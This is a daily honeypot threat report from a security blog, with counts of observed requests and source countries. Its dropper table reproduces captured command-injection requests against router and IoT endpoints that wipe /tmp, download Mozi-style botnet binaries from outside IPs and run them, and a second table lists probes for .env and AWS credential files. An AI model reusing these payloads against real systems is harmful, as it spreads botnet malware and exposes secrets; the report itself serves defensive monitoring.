Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-05-03

·440 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-03
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 5 stage 1 IP address(es), linked to 5 dropper URL(s).

There are 27 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1388 requests were recorded during the day, originating from 5 different countries, with a peak of 274 requests coming from NL.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
USIsrael

botnet_dropper_behaviour
#

remote_addrrequest
79.116.34.227GET /shell?cd+/tmp;rm+-rf+*;wget+176.65.148.180/jaws;sh+/tmp/jaws HTTP/1.1
122.97.214.128GET /shell?cd+/tmp;rm+-rf+*;wget+http://102.97.172.58:47010/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
122.97.137.166GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://102.97.194.141:32859/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
45.95.147.209GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1
185.218.84.39GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\x5C/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\x5C/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
684GET /developmentserver/metadatauploader HTTP/1.1
1941GET /system.ini?loginuse=LOGIN&?loginpas=PASS HTTP/1.1
2071GET /cron/aws_ses.env HTTP/1.1
2141GET /secrets/aws_ses.env HTTP/1.1
2211GET /cli/aws_ses.env HTTP/1.1
2301GET /aws-sns/.env HTTP/1.1
2311GET /var/lib/aws/sns.env HTTP/1.1
2321GET /var/aws/ses.env HTTP/1.1
2441GET /aws-ses/.env HTTP/1.1
2461GET /cli/aws_sns.env HTTP/1.1
2471GET /.sendgrind.env HTTP/1.1
2481GET /var/lib/aws/ses.env HTTP/1.1
2591GET /src/tests/fixtures/typeScriptVisualizeProject/.env HTTP/1.1
2621GET /secret/aws_ses.env HTTP/1.1
2671GET /storage/aws_ses.env HTTP/1.1
2711GET /opt/aws/ses.env HTTP/1.1
2761GET /var/www/aws-sns.env HTTP/1.1
2811GET /data/aws/ses.env HTTP/1.1
2821GET /src/tests/fixtures/typeScriptProject/.env HTTP/1.1
3091GET /var/aws/sns.env HTTP/1.1
3101GET /storage/aws_sns.env HTTP/1.1
3141GET /secret/aws_sns.env HTTP/1.1
3191GET /opt/aws/sns.env HTTP/1.1
3231GET /src/tests/fixtures/instanceWithDependentSteps/.env HTTP/1.1
3301GET /secrets/aws_sns.env HTTP/1.1
3441GET /cron/aws_sns.env HTTP/1.1
3501GET /data/aws/sns.env HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0274NL
1239US
2219GB
3166BG
470SC
562CH
656CN
747VN
839PL
932HK
1029DE
1128IN
1216KR
1312CA
1411AZ
1510SG
1610UA
178CZ
187UZ
196HR
204GH
214AO
224EE
234JP
243BE
253PT
263FR
272DO
282PE
292KW
302TR
312ES
322IT
331LT
341HU
351AU
361DK
371ID
381MC
391BR
401RU
411AR
421SE

Related

Report: 2025-05-02
·307 words
Repport Daily
Report: 2025-05-01
·9460 words
Repport Daily
Report: 2025-04-30
·681 words
Repport Daily